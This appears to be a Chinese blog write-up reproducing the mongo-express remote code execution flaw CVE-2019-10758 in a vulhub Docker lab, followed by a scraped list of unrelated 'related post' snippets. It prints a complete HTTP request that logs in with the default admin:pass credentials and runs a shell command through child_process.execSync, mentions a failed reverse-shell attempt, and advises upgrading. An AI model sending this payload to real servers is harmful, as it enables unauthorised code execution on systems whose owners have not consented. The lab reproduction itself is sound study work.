mongo-express 远程代码执行漏洞(CVE-2019-10758)
前言
mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码。
影响版本
mongo-express, 0.54.0 之前的版本
环境搭建
cd vulhub/mongo-express/CVE-2019-10758
docker-compose up -d
环境启动后,访问http://your-ip:8081即可查看到Web页面。
漏洞复现
直接发送如下数据包,即可执行代码this.constructor.constructor(“return process”)().mainModule.require(“child_process”).execSync(“touch /tmp/success”):
POST /checkValid HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Authorization: Basic YWRtaW46cGFzcw==
Content-Type: application/x-www-form-urlencoded
Content-Length: 124document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")
反弹shell,无果
修复建议
升级mongo-express到0.54.0或更高版本。
mongo-express 远程代码执行漏洞(CVE-2019-10758)相关推荐
- php x24 x65 x6d x61,Jboss远程代码执行漏洞CVE:2013-4810获得system权限
此方法成功的渗透至Windows系统并获得最高权限exp 此方法成功的渗透至Windows系统并获得最高权限 exp ?php/*Apache Tomcat/JBoss EJBInvokerServl ...
- CVE-2021-1675: Windows Print Spooler远程代码执行漏洞
** 赶紧点击上方话题进行订阅吧!** 报告编号:B6-2021-062902 报告来源:360CERT 报告作者:360CERT 更新日期:2021-06-29 1 漏洞简述 2021年06月29日 ...
- 【安全风险通告】Spring Framework远程代码执行漏洞(CVE-2022-22965)安全风险通告第二次更新...
奇安信CERT 致力于第一时间为企业级用户提供安全风险通告和有效解决方案. 安全通告 近日,奇安信CERT监测到Spring Framework存在远程代码执行漏洞(CVE-2022-22965),在 ...
- CVE-2018-8174 IE浏览器远程代码执行漏洞
0x00漏洞简介 在2018年5月9日的时候360发表了一份apt攻击分析及溯源报告 文中提到了cve-2018-8174这个漏洞的首次在apt方面的应用 原文地址:http://www.4hou.c ...
- Splunk Enterprise远程代码执行漏洞(CVE-2022-43571)安全风险通告
奇安信CERT 致力于第一时间为企业级用户提供安全风险通告和有效解决方案. 安全通告 Splunk Enterprise是机器数据的引擎.使用Splunk可收集.索引和利用所有应用程序.服务器和设备生 ...
- windows server 2012 远程连不上_CVE20201350 | Windows DNS Server远程代码执行漏洞通告
0x00 漏洞概述 CVE ID CVE-2020-1350 时 间 2020-07-15 类 型 RCE 等 级 严重 远程利用 是 影响范围 0x01 漏洞详情 微软于 ...
- CVE-2021-34527: Windows Print Spooler 蠕虫级远程代码执行漏洞
报告编号:B6-2021-062902 报告来源:360CERT 报告作者:360CERT 更新日期:2021-07-02 1 更新概览 1.漏洞简述新增360CERT对CVE-2021-34527( ...
- 绿盟安全事件响应观察及远程代码执行漏洞
人和管理成为主要入侵突破口 安全需要人.技术.管理的全方位保障,然而人与管理由于其复杂性,常常成为入侵突破口.在 19 年处理的安全事件 中,弱口令事件占比 22%,钓鱼邮件相关事件占比 7%,配置不 ...
- 微软多个 Windows 系统存在远程代码执行漏洞(ICMP协议)(MPS-2023-1376)
漏洞描述 Internet Control Message Protocol (ICMP) 协议是TCP/IP协议簇的一个子协议,用于在IP主机.路由器之间传递控制消息.raw socket 是一种网 ...
- 微软远程桌面服务远程代码执行漏洞
人和管理成为主要入侵突破口 安全需要人.技术.管理的全方位保障,然而人与管理由于其复杂性,常常成为入侵突破口.在 19 年处理的安全事件中,弱口令事件占比 22%,钓鱼邮件相关事件占比 7%,配置不当 ...
最新文章
- FFmpeg中拉取rtsp视频流并缩放显示测试代码
- 设计模式之Adapter(适配器)(转)
- VMware虚拟机Ubuntu系统与物理机Windows 7系统共享文件夹
- docker私有仓库harbor配置helm chart仓库(安装helm chart插件)
- 微信红包随机数字_微信红包的随机算法
- win 2008 server 更改远程桌面端口的方法
- gwt入门和进阶_GWT入门
- P5706 【深基2.例8】再分肥宅水(python3实现)
- Tomcat 启动耗时严重
- HTML五子棋人人对战源代码,五子棋C++源代码 单机 联机 人机对战 人人对战
- vivado 使用DDS IP方法
- s:radio 赋值取值和添加事件
- 17. Store newed objects in smart pointers in standalone statements
- hp1015驱动64位_惠普1015驱动官方下载|
- [iuud8]ios不同版本下推送本地通知
- WPS解决账号登录验证问题(软件抓包重写过验证通用方法)
- 转载一篇ps更换背景色
- 小米10性能再进化!小米带来国内安卓系统GPU驱动首次更新——初阶GPU及其驱动升级认识
- 同济大学计算机科学与技术系,同济大学计算机科学与技术系简介_跨考网
- HBase Shell 命令
热门文章
- 主流微型计算机,主流微型计算机硬件系统维护
- controll层跳转页面_java web开发中的各种层
- 计算机二级选择题复习整理(公共基础部分)
- 3 Convex functions
- c语言ok未定义标识符,C语言中宏的相关知识 - osc_y7ckpzr9的个人空间 - OSCHINA - 中文开源技术交流社区...
- 第十二届蓝桥杯省赛:试题 A: 卡片(Java)
- Java泛型(1)--集合使用泛型Generic、自定义泛型、泛型在继承上的体现、通配符的使用
- mysql AUTO_INC 是否锁_AUTO-INC锁的一些思考
- 求立方根_「每日一学」数学七上:立方根的知识要点
- CF :K 一个含n条边的带权无向连通图,q次查询,每次查询两点间的最短距离。...